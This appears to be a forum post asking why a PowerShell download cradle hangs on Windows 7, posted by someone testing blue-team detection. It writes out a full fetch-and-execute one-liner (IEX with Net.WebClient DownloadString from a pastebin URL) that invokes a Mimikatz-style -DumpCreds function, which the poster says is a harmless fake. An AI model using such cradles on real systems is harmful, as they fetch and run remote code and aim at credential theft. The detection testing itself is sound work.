Hi everybody!
So I’m trying some download cradles on PowerShell for blue team detection on a Windows 7 machine. I wanted to download this test PowerShell script (fake Mimikatz) : https://pastebin.com/FvASwLVQ that runs calculator and print some random information and I wanted to run the main function. So I run the following command :
powershell -c “IEX (New-Object Net.WebClient).DownloadString(‘https://pastebin.com/raw/FvASwLVQ’);Invoke-Mimikatz -DumpCreds”
And immediately after that nothing happens. I’m still on the same PowerShell and I can’t open a a new PowerShell console by any means unless I restart my computer.
The thing is I tested the same command with other scripts and I get the same results…
The IEX command without the “powershell -c” works perfectly and the first command works on every Windows 10! So anyone know the problem? Thanks!
`PSVersion : 5.1.14409.1005`
PS : I tried with a simple command that have the same pattern as the first command but without script :
$var = “notepad”
powershell -c “IEX $var;notepad”
And it worked perfectly! So I don’t understand…